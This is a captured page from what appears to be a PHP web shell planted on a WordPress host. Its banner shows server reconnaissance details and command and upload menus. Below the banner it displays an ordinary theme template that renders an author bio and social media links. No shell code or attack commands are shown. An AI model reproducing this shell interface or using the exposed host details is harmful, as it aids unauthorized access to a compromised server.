|
Server IP : 10.131.40.8 / Your IP : 216.73.216.37 Web Server : Apache System : Linux webd008.cluster131.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64 User : ludmqhh ( 137773) PHP Version : 8.4.10 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/l/u/d/ludmqhh/www/guillaume/wp-content/themes/flexblog/templates/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
$authordesc = get_the_author_meta( 'description' );
if ( !empty($authordesc) ): ?>
<div class="author-description">
<!-- Author Avatar -->
<div class="author-avatar">
<?php echo get_avatar( get_the_author_meta( 'ID' ), 110 ); ?>
</div>
<!-- Author Content -->
<div class="author-content">
<h4><?php the_author_posts_link(); ?></h4>
<p><?php the_author_meta( 'description' ); ?></p>
<div class="author-social">
<?php if( get_the_author_meta( 'facebook' ) ) : ?>
<a href="<?php echo the_author_meta( 'facebook' ); ?>" target="_blank" >
<i class="fa fa-facebook"></i>
</a>
<?php endif; ?>
<?php if( get_the_author_meta( 'twitter' ) ) : ?>
<a href="<?php echo the_author_meta( 'twitter' ); ?>" target="_blank" >
<i class="fa fa-twitter"></i>
</a>
<?php endif; ?>
<?php if( get_the_author_meta( 'instagram' ) ) : ?>
<a href="<?php echo the_author_meta( 'instagram' ); ?>" target="_blank" >
<i class="fa fa-instagram"></i>
</a>
<?php endif; ?>
<?php if( get_the_author_meta( 'pinterest' ) ) : ?>
<a href="<?php echo the_author_meta( 'pinterest' ); ?>" target="_blank" >
<i class="fa fa-pinterest"></i>
</a>
<?php endif; ?>
<?php if( get_the_author_meta( 'bloglovin' ) ) : ?>
<a href="<?php echo the_author_meta( 'bloglovin' ); ?>" target="_blank" >
<i class="fa fa-heart"></i>
</a>
<?php endif; ?>
<?php if( get_the_author_meta( 'google_plus' ) ) : ?>
<a href="<?php echo the_author_meta( 'google_plus' ); ?>" target="_blank" >
<i class="fa fa-google-plus"></i>
</a>
<?php endif; ?>
<?php if( get_the_author_meta( 'tumblr' ) ) : ?>
<a href="<?php echo the_author_meta( 'tumblr' ); ?>" target="_blank" >
<i class="fa fa-tumblr"></i>
</a>
<?php endif; ?>
<?php if( get_the_author_meta( 'youtube' ) ) : ?>
<a href="<?php echo the_author_meta( 'youtube' ); ?>" target="_blank" >
<i class="fa fa-youtube-play"></i>
</a>
<?php endif; ?>
<?php if( get_the_author_meta( 'vine' ) ) : ?>
<a href="<?php echo the_author_meta( 'vine' ); ?>" target="_blank" >
<i class="fa fa-vine"></i>
</a>
<?php endif; ?>
<?php if( get_the_author_meta( 'flickr' ) ) : ?>
<a href="<?php echo the_author_meta( 'flickr' ); ?>" target="_blank" >
<i class="fa fa-flickr"></i>
</a>
<?php endif; ?>
<?php if( get_the_author_meta( 'linkedin' ) ) : ?>
<a href="<?php echo the_author_meta( 'linkedin' ); ?>" target="_blank" >
<i class="fa fa-linkedin"></i>
</a>
<?php endif; ?>
<?php if( get_the_author_meta( 'behance' ) ) : ?>
<a href="<?php echo the_author_meta( 'behance' ); ?>" target="_blank" >
<i class="fa fa-behance"></i>
</a>
<?php endif; ?>
<?php if( get_the_author_meta( 'soundcloud' ) ) : ?>
<a href="<?php echo the_author_meta( 'soundcloud' ); ?>" target="_blank" >
<i class="fa fa-soundcloud"></i>
</a>
<?php endif; ?>
<?php if( get_the_author_meta( 'vimeo' ) ) : ?>
<a href="<?php echo the_author_meta( 'vimeo' ); ?>" target="_blank" >
<i class="fa fa-vimeo"></i>
</a>
<?php endif; ?>
<?php if( get_the_author_meta( 'rss' ) ) : ?>
<a href="<?php echo the_author_meta( 'rss' ); ?>" target="_blank" >
<i class="fa fa-rss"></i>
</a>
<?php endif; ?>
<?php if( get_the_author_meta( 'dribbble' ) ) : ?>
<a href="<?php echo the_author_meta( 'dribbble' ); ?>" target="_blank" >
<i class="fa fa-dribbble"></i>
</a>
<?php endif; ?>
<?php if( get_the_author_meta( 'envelope' ) ) : ?>
<a href="<?php echo the_author_meta( 'envelope' ); ?>" target="_blank" >
<i class="fa fa-envelope-o"></i>
</a>
<?php endif; ?>
</div>
</div>
</div>
<?php endif; ?>